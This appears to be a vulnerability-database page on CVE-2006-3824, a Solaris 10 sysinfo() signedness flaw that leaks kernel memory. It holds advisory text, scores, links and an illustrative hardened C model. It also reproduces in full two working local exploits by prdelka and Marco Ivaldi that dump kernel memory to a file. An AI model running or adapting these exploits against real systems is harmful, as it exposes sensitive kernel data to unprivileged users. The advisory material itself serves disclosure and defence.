CVE-2006-3824
CVSS 4.9
Published: 2006-07-25 09:22:00
Revised: 2011-03-07 21:39:33

[Original] systeminfo.c for Sun Solaris allows local users to read kernel memory via a 0 variable count argument to the sysinfo system call, which causes a -1 argument to be used by the copyout function. NOTE: this issue has been referred to as an integer overflow, but it is probably more like a signedness error or integer underflow.


[CNNVD] Sun sysinfo() Kernel Memory Information Disclosure Vulnerability (CNNVD-200607-411)

        Solaris is a commercial UNIX operating system developed and maintained by Sun.
        The file /usr/src/uts/common/syscall/systeminfo.c in Solaris contains an integer overflow vulnerability that can lead to kernel information disclosure.
        The relevant code (systeminfo.c, lines 125-135) is as follows:

        if (kstr != NULL) {
                if ((strcnt = strlen(kstr)) >= count) {
                        getcnt = count - 1;
                        if (subyte(buf + count - 1, 0) < 0)
                                return (set_errno(EFAULT));
                } else
                        getcnt = strcnt + 1;
                if (copyout(kstr, buf, getcnt))
                        return (set_errno(EFAULT));
                return (strcnt + 1);
        }

        If the user-supplied count variable is 0, the function calls copyout with a length argument of -1. Because copyout interprets the length argument as an unsigned integer, a large amount of data is copied to user space, which allows an attacker to read sensitive kernel memory.
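To make the length arithmetic concrete, here is an added user-space model of the quoted path (not code from this page, from Sun, or from either exploit author): vulnerable_copyout_len reproduces the excerpt's computation and returns the value the way copyout would read it, and hardened_copyout_len is a defensive variant of my own choosing, not Sun's patch, that refuses a count of zero (and a negative count, which the same arithmetic also turns into a huge unsigned length) before any copy length is derived.

```c
#include <stdio.h>
#include <string.h>

/* Length that the quoted kernel path hands to copyout(), seen the way
 * copyout() sees it: as an unsigned size_t. "count" is the caller-supplied
 * buffer size, "kstr" the kernel string being returned to the caller. */
size_t vulnerable_copyout_len(const char *kstr, long count)
{
    long strcnt = (long)strlen(kstr);
    long getcnt;

    if (strcnt >= count)
        getcnt = count - 1;   /* count == 0 yields -1 here */
    else
        getcnt = strcnt + 1;  /* string plus its terminating NUL */

    return (size_t)getcnt;    /* -1 converts to SIZE_MAX */
}

/* Hardened variant (this example's own choice, not Sun's fix): a buffer that
 * cannot hold even the terminating NUL is refused before any length is
 * derived, which also covers negative counts. Returns 0 and stores the copy
 * length, or -1 when the request must be rejected (EINVAL in a kernel). */
int hardened_copyout_len(const char *kstr, long count, size_t *len)
{
    long strcnt = (long)strlen(kstr);

    if (count <= 0)
        return -1;
    *len = (strcnt >= count) ? (size_t)(count - 1) : (size_t)(strcnt + 1);
    return 0;
}

int main(void)
{
    size_t len = 0;

    printf("count=0  -> copyout length %zu (vulnerable path)\n",
           vulnerable_copyout_len("SunOS", 0));
    printf("count=0  -> %s (hardened path)\n",
           hardened_copyout_len("SunOS", 0, &len) ? "rejected" : "copied");
    printf("count=16 -> copyout length %zu (both paths)\n",
           vulnerable_copyout_len("SunOS", 16));
    return 0;
}
```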

- CVSS (base score)

CVSS score: 4.9 [MEDIUM]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:10.0::sparc
cpe:/o:sun:solaris:10.0::x86

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3824
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3824
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-411
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/19104
(PATCH)  BID  19104
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
(PATCH)  MISC  http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
http://www.vupen.com/english/advisories/2006/2936
(UNKNOWN)  VUPEN  ADV-2006-2936
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
(UNKNOWN)  IDEFENSE  20060720 Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://xforce.iss.net/xforce/xfdb/27901
(UNKNOWN)  XF  solaris-systeminfo-overflow(27901)
http://www.securityfocus.com/archive/1/archive/1/440986/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060724 Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://www.securityfocus.com/archive/1/archive/1/440849/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060721 Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://securitytracker.com/id?1016555
(UNKNOWN)  SECTRACK  1016555
http://secunia.com/advisories/21148
(UNKNOWN)  SECUNIA  21148

- Vulnerability information

Sun sysinfo() Kernel Memory Information Disclosure Vulnerability
Medium severity  Buffer overflow
2006-07-25 00:00:00  2006-07-26 00:00:00
Local

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; patch download link:
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102343-1

- Vulnerability information (2067)

Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit (EDBID:2067)
solaris local
2006-07-24 Verified
0 prdelka
N/A
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define bufsize 1294967293

int main(int argc, char *argv[])
{
	int fd;
	ssize_t out;
	char *output_buffer;

	if (argc < 2) {
		printf("[ Use with <filepath>\n");
		exit(1);
	}
	printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");

	/* zero-filled buffer that receives whatever the kernel copies out */
	output_buffer = malloc(bufsize);
	if (output_buffer == NULL) {
		perror("malloc");
		exit(1);
	}
	memset(output_buffer, 0, bufsize);

	/* count of 0: the kernel path described above derives a -1 length */
	sysinfo(SI_SYSNAME, output_buffer, 0);

	/* save the buffer contents to the file named on the command line */
	fd = open(argv[1], O_RDWR | O_CREAT, 0700);
	if (fd != -1) {
		out = write(fd, output_buffer, bufsize);
		printf("[ Wrote %ld bytes to %s\n", (long)out, argv[1]);
		close(fd);
	}
	exit(0);
}

// milw0rm.com [2006-07-24]
		

- Vulnerability information (2241)

Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit (EDBID:2241)
solaris local
2006-08-22 Verified
0 Marco Ivaldi
N/A
/*
 * $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $
 *
 * raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * systeminfo.c for Sun Solaris allows local users to read kernel memory via 
 * a 0 variable count argument to the sysinfo system call, which causes a -1 
 * argument to be used by the copyout function. NOTE: this issue has been 
 * referred to as an integer overflow, but it is probably more like a 
 * signedness error or integer underflow (CVE-2006-3824).
 *
 * http://en.wikipedia.org/wiki/Pitagora_Suicchi
 *
 * Greets to prdelka, who also exploited this vulnerability.
 *
 * I should also definitely investigate the old sysinfo(2) vulnerability 
 * described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and 
 * Solaris/x86 2.6 through 8... It may come in handy sooner or later;)
 *
 * Usage:
 * $ gcc raptor_sysinfo.c -o raptor_sysinfo -Wall
 * $ ./raptor_sysinfo kerndump 666666
 * [...]
 * $ ls -l kerndump 
 * -rwx------   1 raptor   other     666666 Aug 22 14:41 kerndump
 *
 * Vulnerable platforms (SPARC):
 * Solaris 10 without patch 118833-09 [tested]
 *
 * Vulnerable platforms (x86):
 * Solaris 10 without patch 118855-06 [untested]
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	INFO1	"raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak"
#define	INFO2	"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define BUFSIZE 536870911

int main(int argc, char **argv)
{
	int 	fd;
	size_t	out, bufsize = BUFSIZE;
	char	*buf;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
		exit(1);
	}
	if (argc > 2)
		if ((bufsize = atoi(argv[2])) == 0) {
			fprintf(stderr, "Error (atoi): invalid outsize\n");
			exit(1);
		}

	/* print some output */
	fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
	fprintf(stderr, "Using outsize\t: %zu\n\n", bufsize);

	/* prepare the output buffer */
	if ((buf = (char *)malloc(bufsize)) == NULL) {
		perror("Error (malloc)");
		fprintf(stderr, "Hint: Try again with a smaller output size\n");
		exit(1);
	}
	memset(buf, 0, bufsize);

	/* Pitagora Suicchi! */
	sysinfo(SI_SYSNAME, buf, 0);

	/* save output to outfile */
	if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
		perror("Error (open)");
		free(buf);
		exit(1);
	}
	out = write(fd, buf, bufsize);
	fprintf(stderr, "Pitagora Suicchi! %zu bytes written to %s\n", out, argv[1]);
	fprintf(stderr, "Hint: Try also with a bigger output size\n");

	close(fd);
	free(buf);

	exit(0);
}

// milw0rm.com [2006-08-22]
		

- Vulnerability information

27438
Solaris sysinfo() Overflow Kernel Memory Disclosure
Input Manipulation
Loss of Integrity
Vendor Verified

- Timeline

2006-07-20 Unknown
2006-07-21 2006-07-21

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Sun Solaris SysInfo Local Information Disclosure Vulnerability
Bugtraq ID: 19104
Class: Design Error
Remote: No
Local: Yes
Published: 2006-07-21 12:00:00
Updated: 2007-06-27 03:48:00
Credit: The original discoverer of this vulnerability wishes to remain anonymous. iDefense reported this issue to the vendor.

- Affected program versions

Sun Solaris 10_x86
Sun Solaris 10
Avaya Interactive Response

- Vulnerability discussion

Sun Solaris is prone to a local information-disclosure vulnerability because the kernel fails to properly ensure that unintended memory is not disclosed to local users.

This issue allows local attackers to gain access to potentially sensitive kernel memory. Information harvested by exploiting this issue may aid attackers in further attacks.

- Exploits

The following exploits are available:

- Solution

Sun has released a security alert along with patches to address this issue. Please see the referenced alert for more information.


Sun Solaris 10

Sun Solaris 10_x86
